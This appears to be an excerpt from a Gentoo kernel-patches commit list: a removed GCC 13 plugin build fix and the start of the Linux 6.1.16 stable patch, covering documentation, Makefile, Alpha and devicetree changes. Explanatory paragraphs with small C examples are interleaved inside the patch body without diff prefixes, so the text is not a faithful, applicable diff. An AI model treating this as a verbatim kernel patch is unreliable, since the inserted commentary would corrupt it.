diff --git a/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch b/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
deleted file mode 100644
index 55797805..00000000
--- a/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 5a6b64adc18d9adfb497a529ff004d59b6df151f Mon Sep 17 00:00:00 2001
-From: Sam James <sam@gentoo.org>
-Date: Wed, 1 Feb 2023 23:00:09 +0000
-Subject: gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
-
-The latest GCC 13 snapshot (13.0.1 20230129) gives the following:
-```
-cc1: error: cannot load plugin ./scripts/gcc-plugins/randomize_layout_plugin.so
- :./scripts/gcc-plugins/randomize_layout_plugin.so: undefined symbol: tree_code_type
-```
-
-This ends up being because of https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=b0241ce6e37031
-upstream in GCC which changes the visibility of some types used by the kernel's
-plugin infrastructure like tree_code_type.
-
-After discussion with the GCC folks, we found that the kernel needs to be building
-plugins with the same flags used to build GCC - and GCC defaults to gnu++17
-right now. The minimum GCC version needed to build the kernel is GCC 5.1
-and GCC 5.1 already defaults to gnu++14 anyway, so just drop the flag, as
-all GCCs that could be used to build GCC already default to an acceptable
-version which was >= the version we forced via flags until now.
-
-Bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=108634
-Signed-off-by: Sam James <sam@gentoo.org>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Link: https://lore.kernel.org/r/20230201230009.2252783-1-sam@gentoo.org
----
- scripts/gcc-plugins/Makefile | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
-index b34d11e226366..320afd3cf8e82 100644
---- a/scripts/gcc-plugins/Makefile
-+++ b/scripts/gcc-plugins/Makefile
-@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
- plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
- 		  -include $(srctree)/include/linux/compiler-version.h \
- 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
--		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
-+		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
- 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
- 		  -ggdb -Wno-narrowing -Wno-unused-variable \
- 		  -Wno-format-diag
--- 
-cgit 
-


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-10 12:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-10 12:47 UTC (permalink / raw
  To: gentoo-commits

commit:     fdfe8d25be63e9e674096f0cdaabe3cc5d6260f3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 10 12:46:56 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 10 12:46:56 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=fdfe8d25

Linux patch 6.1.16

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1015_linux-6.1.16.patch | 32483 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 32487 insertions(+)

diff --git a/0000_README b/0000_README
index 6e5b60b1..f2ba9399 100644
--- a/0000_README
+++ b/0000_README
@@ -103,6 +103,10 @@ Patch:  1014_linux-6.1.15.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.15
 
+Patch:  1015_linux-6.1.16.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.16
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1015_linux-6.1.16.patch b/1015_linux-6.1.16.patch
new file mode 100644
index 00000000..abb8b060
--- /dev/null
+++ b/1015_linux-6.1.16.patch
@@ -0,0 +1,32483 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 5b86245450bdc..2524061836acc 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -86,6 +86,8 @@ Brief summary of control files.
+  memory.swappiness		     set/show swappiness parameter of vmscan
+ 				     (See sysctl's vm.swappiness)
+  memory.move_charge_at_immigrate     set/show controls of moving charges
++                                     This knob is deprecated and shouldn't be
++                                     used.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+@@ -716,8 +718,15 @@ NOTE2:
+        It is recommended to set the soft limit always below the hard limit,
+        otherwise the hard limit will take precedence.
+ 
+-8. Move charges at task migration
+-=================================
++8. Move charges at task migration (DEPRECATED!)
++===============================================
++
++THIS IS DEPRECATED!
++
++It's expensive and unreliable! It's better practice to launch workload
++tasks directly from inside their target cgroup. Use dedicated workload
++cgroups to allow fine-grained policy adjustments without having to
++move physical pages between control domains.
+ 
+ Users can move charges associated with a task along with task migration, that
+ is, uncharge task's pages from the old cgroup and charge them to the new cgroup.
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index c4dcdb3d0d451..a39bbfe9526b6 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -479,8 +479,16 @@ Spectre variant 2
+    On Intel Skylake-era systems the mitigation covers most, but not all,
+    cases. See :ref:`[3] <spec_ref3>` for more details.
+ 
+-   On CPUs with hardware mitigation for Spectre variant 2 (e.g. Enhanced
+-   IBRS on x86), retpoline is automatically disabled at run time.
++   On CPUs with hardware mitigation for Spectre variant 2 (e.g. IBRS
++   or enhanced IBRS on x86), retpoline is automatically disabled at run time.
++
++   Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
++   boot, by setting the IBRS bit, and they're automatically protected against
++   Spectre v2 variant attacks, including cross-thread branch target injections
++   on SMT systems (STIBP). In other words, eIBRS enables STIBP too.
++
++   Legacy IBRS systems clear the IBRS bit on exit to userspace and
++   therefore explicitly enable STIBP for that
+ 
+    The retpoline mitigation is turned on by default on vulnerable
+    CPUs. It can be forced on or off by the administrator
+@@ -504,9 +512,12 @@ Spectre variant 2
+    For Spectre variant 2 mitigation, individual user programs
+    can be compiled with return trampolines for indirect branches.
+    This protects them from consuming poisoned entries in the branch
+-   target buffer left by malicious software.  Alternatively, the
+-   programs can disable their indirect branch speculation via prctl()
+-   (See :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
++   target buffer left by malicious software.
++
++   On legacy IBRS systems, at return to userspace, implicit STIBP is disabled
++   because the kernel clears the IBRS bit. In this case, the userspace programs
++   can disable indirect branch speculation via prctl() (See
++   :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
+    On x86, this will turn on STIBP to guard against attacks from the
+    sibling thread when the user program is running, and use IBPB to
+    flush the branch target buffer when switching to/from the program.
+diff --git a/Documentation/admin-guide/kdump/gdbmacros.txt b/Documentation/admin-guide/kdump/gdbmacros.txt
+index 82aecdcae8a6c..030de95e3e6b2 100644
+--- a/Documentation/admin-guide/kdump/gdbmacros.txt
++++ b/Documentation/admin-guide/kdump/gdbmacros.txt
+@@ -312,10 +312,10 @@ define dmesg
+ 			set var $prev_flags = $info->flags
+ 		end
+ 
+-		set var $id = ($id + 1) & $id_mask
+ 		if ($id == $end_id)
+ 			loop_break
+ 		end
++		set var $id = ($id + 1) & $id_mask
+ 	end
+ end
+ document dmesg
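
The gdbmacros fix moves the ring-buffer id increment after the
end-of-buffer test: end_id names the newest record itself, so testing
before advancing lets that record be printed on its final pass instead
of being skipped. The same loop shape in a small self-contained C
example (toy ring, hypothetical names):

#include <stdio.h>

#define ID_MASK 7U                      /* toy 8-slot ring */

static void dump_ring(const char *rec[], unsigned int id,
                      unsigned int end_id)
{
        for (;;) {
                printf("%s\n", rec[id]);    /* process current record */
                if (id == end_id)           /* newest one just printed */
                        break;
                id = (id + 1) & ID_MASK;    /* advance only afterwards */
        }
}

int main(void)
{
        const char *rec[8] = { "r0", "r1", "r2", "r3",
                               "r4", "r5", "r6", "r7" };

        dump_ring(rec, 6, 1);               /* wraps: r6 r7 r0 r1 */
        return 0;
}
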
+diff --git a/Documentation/bpf/instruction-set.rst b/Documentation/bpf/instruction-set.rst
+index 5d798437dad47..3ba6475cfbfc7 100644
+--- a/Documentation/bpf/instruction-set.rst
++++ b/Documentation/bpf/instruction-set.rst
+@@ -99,19 +99,26 @@ code      value  description
+ BPF_ADD   0x00   dst += src
+ BPF_SUB   0x10   dst -= src
+ BPF_MUL   0x20   dst \*= src
+-BPF_DIV   0x30   dst /= src
++BPF_DIV   0x30   dst = (src != 0) ? (dst / src) : 0
+ BPF_OR    0x40   dst \|= src
+ BPF_AND   0x50   dst &= src
+ BPF_LSH   0x60   dst <<= src
+ BPF_RSH   0x70   dst >>= src
+ BPF_NEG   0x80   dst = ~src
+-BPF_MOD   0x90   dst %= src
++BPF_MOD   0x90   dst = (src != 0) ? (dst % src) : dst
+ BPF_XOR   0xa0   dst ^= src
+ BPF_MOV   0xb0   dst = src
+ BPF_ARSH  0xc0   sign extending shift right
+ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ ========  =====  ==========================================================
+ 
++Underflow and overflow are allowed during arithmetic operations, meaning
++the 64-bit or 32-bit value will wrap. If eBPF program execution would
++result in division by zero, the destination register is instead set to zero.
++If execution would result in modulo by zero, for ``BPF_ALU64`` the value of
++the destination register is unchanged whereas for ``BPF_ALU`` the upper
++32 bits of the destination register are zeroed.
++
+ ``BPF_ADD | BPF_X | BPF_ALU`` means::
+ 
+   dst_reg = (u32) dst_reg + (u32) src_reg;
+@@ -128,6 +135,11 @@ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ 
+   src_reg = src_reg ^ imm32
+ 
++Also note that the division and modulo operations are unsigned. Thus, for
++``BPF_ALU``, 'imm' is first interpreted as an unsigned 32-bit value, whereas
++for ``BPF_ALU64``, 'imm' is first sign extended to 64 bits and the result
++interpreted as an unsigned 64-bit value. There are no instructions for
++signed division or modulo.
+ 
+ Byte swap instructions
+ ~~~~~~~~~~~~~~~~~~~~~~
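
The added documentation text pins down edge cases that previously had
to be inferred. Restated as plain C helpers (this is just the
documented semantics, not kernel source):

#include <stdint.h>

/* BPF_ALU64: unsigned 64-bit; x/0 yields 0, x%0 leaves dst unchanged. */
static uint64_t bpf_alu64_div(uint64_t dst, uint64_t src)
{
        return src != 0 ? dst / src : 0;
}

static uint64_t bpf_alu64_mod(uint64_t dst, uint64_t src)
{
        return src != 0 ? dst % src : dst;
}

/* BPF_ALU: 'imm' is treated as unsigned 32-bit, and the upper 32 bits
 * of the destination are zeroed even in the mod-by-zero case. */
static uint64_t bpf_alu32_mod(uint64_t dst, uint32_t imm)
{
        uint32_t lo = (uint32_t)dst;

        return imm != 0 ? lo % imm : lo;    /* zero-extends to 64 bits */
}
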
+diff --git a/Documentation/dev-tools/gdb-kernel-debugging.rst b/Documentation/dev-tools/gdb-kernel-debugging.rst
+index 8e0f1fe8d17ad..895285c037c72 100644
+--- a/Documentation/dev-tools/gdb-kernel-debugging.rst
++++ b/Documentation/dev-tools/gdb-kernel-debugging.rst
+@@ -39,6 +39,10 @@ Setup
+   this mode. In this case, you should build the kernel with
+   CONFIG_RANDOMIZE_BASE disabled if the architecture supports KASLR.
+ 
++- Build the gdb scripts (required on kernels v5.1 and above)::
++
++    make scripts_gdb
++
+ - Enable the gdb stub of QEMU/KVM, either
+ 
+     - at VM startup time by appending "-s" to the QEMU command line
+diff --git a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+index 63fb02014a56a..117e3db43f84a 100644
+--- a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
++++ b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+@@ -32,7 +32,7 @@ properties:
+       - items:
+           - enum:
+               - mediatek,mt8186-disp-ccorr
+-          - const: mediatek,mt8183-disp-ccorr
++          - const: mediatek,mt8192-disp-ccorr
+ 
+   reg:
+     maxItems: 1
+diff --git a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+index 5b8d59245f82f..b358fd601ed38 100644
+--- a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
++++ b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+@@ -62,7 +62,7 @@ patternProperties:
+         description: phandle of the CPU DAI
+ 
+     patternProperties:
+-      "^codec-[0-9]+$":
++      "^codec(-[0-9]+)?$":
+         type: object
+         additionalProperties: false
+         description: |-
+diff --git a/Documentation/hwmon/ftsteutates.rst b/Documentation/hwmon/ftsteutates.rst
+index 58a2483d8d0da..198fa8e2819da 100644
+--- a/Documentation/hwmon/ftsteutates.rst
++++ b/Documentation/hwmon/ftsteutates.rst
+@@ -22,6 +22,10 @@ enhancements. It can monitor up to 4 voltages, 16 temperatures and
+ 8 fans. It also contains an integrated watchdog which is currently
+ implemented in this driver.
+ 
++The 4 voltages require a board-specific multiplier, since the BMC can
++only measure voltages up to 3.3V and thus relies on voltage dividers.
++Consult your motherboard manual for details.
++
+ To clear a temperature or fan alarm, execute the following command with the
+ correct path to the alarm file::
+ 
+diff --git a/Documentation/virt/kvm/api.rst b/Documentation/virt/kvm/api.rst
+index b8ec88ef2efa2..1bc61bf804f1f 100644
+--- a/Documentation/virt/kvm/api.rst
++++ b/Documentation/virt/kvm/api.rst
+@@ -4483,6 +4483,18 @@ not holding a previously reported uncorrected error).
+ :Parameters: struct kvm_s390_cmma_log (in, out)
+ :Returns: 0 on success, a negative value on error
+ 
++Errors:
++
++  ======     =============================================================
++  ENOMEM     not enough memory can be allocated to complete the task
++  ENXIO      if CMMA is not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but migration mode was not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but dirty tracking has been
++             disabled (and thus migration mode was automatically disabled)
++  EFAULT     if the userspace address is invalid or if no page table is
++             present for the addresses (e.g. when using hugepages).
++  ======     =============================================================
++
+ This ioctl is used to get the values of the CMMA bits on the s390
+ architecture. It is meant to be used in two scenarios:
+ 
+@@ -4563,12 +4575,6 @@ mask is unused.
+ 
+ values points to the userspace buffer where the result will be stored.
+ 
+-This ioctl can fail with -ENOMEM if not enough memory can be allocated to
+-complete the task, with -ENXIO if CMMA is not enabled, with -EINVAL if
+-KVM_S390_CMMA_PEEK is not set but migration mode was not enabled, with
+--EFAULT if the userspace address is invalid or if no page table is
+-present for the addresses (e.g. when using hugepages).
+-
+ 4.108 KVM_S390_SET_CMMA_BITS
+ ----------------------------
+ 
+diff --git a/Documentation/virt/kvm/devices/vm.rst b/Documentation/virt/kvm/devices/vm.rst
+index 60acc39e0e937..147efec626e52 100644
+--- a/Documentation/virt/kvm/devices/vm.rst
++++ b/Documentation/virt/kvm/devices/vm.rst
+@@ -302,6 +302,10 @@ Allows userspace to start migration mode, needed for PGSTE migration.
+ Setting this attribute when migration mode is already active will have
+ no effects.
+ 
++Dirty tracking must be enabled on all memslots, else -EINVAL is returned. When
++dirty tracking is disabled on any memslot, migration mode is automatically
++stopped.
++
+ :Parameters: none
+ :Returns:   -ENOMEM if there is not enough free memory to start migration mode;
+ 	    -EINVAL if the state of the VM is invalid (e.g. no memory defined);
+diff --git a/Makefile b/Makefile
+index 4dfe902b7f193..5ac6895229e9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 15
++SUBLEVEL = 16
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+@@ -93,10 +93,17 @@ endif
+ 
+ # If the user is running make -s (silent mode), suppress echoing of
+ # commands
++# make-4.0 (and later) keep single letter options in the 1st word of MAKEFLAGS.
+ 
+-ifneq ($(findstring s,$(filter-out --%,$(MAKEFLAGS))),)
+-  quiet=silent_
+-  KBUILD_VERBOSE = 0
++ifeq ($(filter 3.%,$(MAKE_VERSION)),)
++silence:=$(findstring s,$(firstword -$(MAKEFLAGS)))
++else
++silence:=$(findstring s,$(filter-out --%,$(MAKEFLAGS)))
++endif
++
++ifeq ($(silence),s)
++quiet=silent_
++KBUILD_VERBOSE = 0
+ endif
+ 
+ export quiet Q KBUILD_VERBOSE
+diff --git a/arch/alpha/boot/tools/objstrip.c b/arch/alpha/boot/tools/objstrip.c
+index 08b430d25a315..7cf92d172dce9 100644
+--- a/arch/alpha/boot/tools/objstrip.c
++++ b/arch/alpha/boot/tools/objstrip.c
+@@ -148,7 +148,7 @@ main (int argc, char *argv[])
+ #ifdef __ELF__
+     elf = (struct elfhdr *) buf;
+ 
+-    if (elf->e_ident[0] == 0x7f && str_has_prefix((char *)elf->e_ident + 1, "ELF")) {
++    if (memcmp(&elf->e_ident[EI_MAG0], ELFMAG, SELFMAG) == 0) {
+ 	if (elf->e_type != ET_EXEC) {
+ 	    fprintf(stderr, "%s: %s is not an ELF executable\n",
+ 		    prog_name, inname);
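
The objstrip change replaces the 0x7f-plus-string-prefix test with a
single memcmp() over all four magic bytes, using the ELFMAG/SELFMAG
constants that <elf.h> provides for exactly this purpose. A minimal
standalone equivalent:

#include <elf.h>
#include <string.h>

/* Returns nonzero when buf starts with the ELF magic "\177ELF". */
static int is_elf_image(const unsigned char *buf)
{
        const Elf64_Ehdr *ehdr = (const Elf64_Ehdr *)buf;

        return memcmp(&ehdr->e_ident[EI_MAG0], ELFMAG, SELFMAG) == 0;
}
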
+diff --git a/arch/alpha/kernel/traps.c b/arch/alpha/kernel/traps.c
+index 8a66fe544c69b..d9a67b370e047 100644
+--- a/arch/alpha/kernel/traps.c
++++ b/arch/alpha/kernel/traps.c
+@@ -233,7 +233,21 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ {
+ 	int signo, code;
+ 
+-	if ((regs->ps & ~IPL_MAX) == 0) {
++	if (type == 3) { /* FEN fault */
++		/* Irritating users can call PAL_clrfen to disable the
++		   FPU for the process.  The kernel will then trap in
++		   do_switch_stack and undo_switch_stack when we try
++		   to save and restore the FP registers.
++
++		   Given that GCC by default generates code that uses the
++		   FP registers, PAL_clrfen is not useful except for DoS
++		   attacks.  So turn the bleeding FPU back on and be done
++		   with it.  */
++		current_thread_info()->pcb.flags |= 1;
++		__reload_thread(&current_thread_info()->pcb);
++		return;
++	}
++	if (!user_mode(regs)) {
+ 		if (type == 1) {
+ 			const unsigned int *data
+ 			  = (const unsigned int *) regs->pc;
+@@ -366,20 +380,6 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ 		}
+ 		break;
+ 
+-	      case 3: /* FEN fault */
+-		/* Irritating users can call PAL_clrfen to disable the
+-		   FPU for the process.  The kernel will then trap in
+-		   do_switch_stack and undo_switch_stack when we try
+-		   to save and restore the FP registers.
+-
+-		   Given that GCC by default generates code that uses the
+-		   FP registers, PAL_clrfen is not useful except for DoS
+-		   attacks.  So turn the bleeding FPU back on and be done
+-		   with it.  */
+-		current_thread_info()->pcb.flags |= 1;
+-		__reload_thread(&current_thread_info()->pcb);
+-		return;
+-
+ 	      case 5: /* illoc */
+ 	      default: /* unexpected instruction-fault type */
+ 		      ;
+diff --git a/arch/arm/boot/dts/exynos3250-rinato.dts b/arch/arm/boot/dts/exynos3250-rinato.dts
+index 6d2c7bb191842..2eb682009815a 100644
+--- a/arch/arm/boot/dts/exynos3250-rinato.dts
++++ b/arch/arm/boot/dts/exynos3250-rinato.dts
+@@ -250,7 +250,7 @@
+ 	i80-if-timings {
+ 		cs-setup = <0>;
+ 		wr-setup = <0>;
+-		wr-act = <1>;
++		wr-active = <1>;
+ 		wr-hold = <0>;
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+index 021d9fc1b4923..27a1a89526655 100644
+--- a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+@@ -10,7 +10,7 @@
+ / {
+ thermal-zones {
+ 	cpu_thermal: cpu-thermal {
+-		thermal-sensors = <&tmu 0>;
++		thermal-sensors = <&tmu>;
+ 		polling-delay-passive = <0>;
+ 		polling-delay = <0>;
+ 		trips {
+diff --git a/arch/arm/boot/dts/exynos4.dtsi b/arch/arm/boot/dts/exynos4.dtsi
+index 5c4ecda27a476..7ba7a18c25000 100644
+--- a/arch/arm/boot/dts/exynos4.dtsi
++++ b/arch/arm/boot/dts/exynos4.dtsi
+@@ -605,7 +605,7 @@
+ 			status = "disabled";
+ 
+ 			hdmi_i2c_phy: hdmiphy@38 {
+-				compatible = "exynos4210-hdmiphy";
++				compatible = "samsung,exynos4210-hdmiphy";
+ 				reg = <0x38>;
+ 			};
+ 		};
+diff --git a/arch/arm/boot/dts/exynos4210.dtsi b/arch/arm/boot/dts/exynos4210.dtsi
+index 2c25cc37934e8..f8c6c5d1906af 100644
+--- a/arch/arm/boot/dts/exynos4210.dtsi
++++ b/arch/arm/boot/dts/exynos4210.dtsi
+@@ -393,7 +393,6 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
+ };
+ 
+ &gic {
+diff --git a/arch/arm/boot/dts/exynos5250.dtsi b/arch/arm/boot/dts/exynos5250.dtsi
+index 4708dcd575a77..01751706ff96d 100644
+--- a/arch/arm/boot/dts/exynos5250.dtsi
++++ b/arch/arm/boot/dts/exynos5250.dtsi
+@@ -1107,7 +1107,7 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
++	thermal-sensors = <&tmu>;
+ 
+ 	cooling-maps {
+ 		map0 {
+diff --git a/arch/arm/boot/dts/exynos5410-odroidxu.dts b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+index d1cbc6b8a5703..e18110b93875a 100644
+--- a/arch/arm/boot/dts/exynos5410-odroidxu.dts
++++ b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+@@ -120,7 +120,6 @@
+ };
+ 
+ &cpu0_thermal {
+-	thermal-sensors = <&tmu_cpu0 0>;
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+ 
+diff --git a/arch/arm/boot/dts/exynos5420.dtsi b/arch/arm/boot/dts/exynos5420.dtsi
+index 9f2523a873d9d..62263eb91b3cc 100644
+--- a/arch/arm/boot/dts/exynos5420.dtsi
++++ b/arch/arm/boot/dts/exynos5420.dtsi
+@@ -592,7 +592,7 @@
+ 		};
+ 
+ 		mipi_phy: mipi-video-phy {
+-			compatible = "samsung,s5pv210-mipi-video-phy";
++			compatible = "samsung,exynos5420-mipi-video-phy";
+ 			syscon = <&pmu_system_controller>;
+ 			#phy-cells = <1>;
+ 		};
+diff --git a/arch/arm/boot/dts/exynos5422-odroidhc1.dts b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+index 3de7019572a20..5e42803937067 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidhc1.dts
++++ b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+@@ -31,7 +31,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			trips {
+ 				cpu0_alert0: cpu-alert-0 {
+ 					temperature = <70000>; /* millicelsius */
+@@ -86,7 +86,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			trips {
+ 				cpu1_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -130,7 +130,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			trips {
+ 				cpu2_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -174,7 +174,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			trips {
+ 				cpu3_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -218,7 +218,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			trips {
+ 				gpu_alert0: gpu-alert-0 {
+ 					temperature = <70000>;
+diff --git a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+index a6961ff240304..e6e7e2ff2a261 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
++++ b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+@@ -50,7 +50,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -139,7 +139,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -212,7 +212,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -285,7 +285,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -358,7 +358,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 0fc9e6b8b05dc..11b9321badc51 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -513,7 +513,7 @@
+ 
+ 				mux: mux-controller {
+ 					compatible = "mmio-mux";
+-					#mux-control-cells = <0>;
++					#mux-control-cells = <1>;
+ 					mux-reg-masks = <0x14 0x00000010>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index c72540223fa92..29fdf29fdb8c8 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -577,7 +577,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx55-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx55-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x20000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/qcom-sdx65.dtsi b/arch/arm/boot/dts/qcom-sdx65.dtsi
+index 4cd405db55000..ecb9171e4da5f 100644
+--- a/arch/arm/boot/dts/qcom-sdx65.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx65.dtsi
+@@ -455,7 +455,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx65-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx65-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x40000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/stm32mp131.dtsi b/arch/arm/boot/dts/stm32mp131.dtsi
+index dd35a607073dd..723787f72cfd9 100644
+--- a/arch/arm/boot/dts/stm32mp131.dtsi
++++ b/arch/arm/boot/dts/stm32mp131.dtsi
+@@ -405,6 +405,7 @@
+ 
+ 			part_number_otp: part_number_otp@4 {
+ 				reg = <0x4 0x2>;
++				bits = <0 12>;
+ 			};
+ 			ts_cal1: calib@5c {
+ 				reg = <0x5c 0x2>;
+diff --git a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+index 43641cb82398f..343b02b971555 100644
+--- a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
++++ b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+@@ -57,7 +57,7 @@
+ 		regulator-ramp-delay = <50>; /* 4ms */
+ 
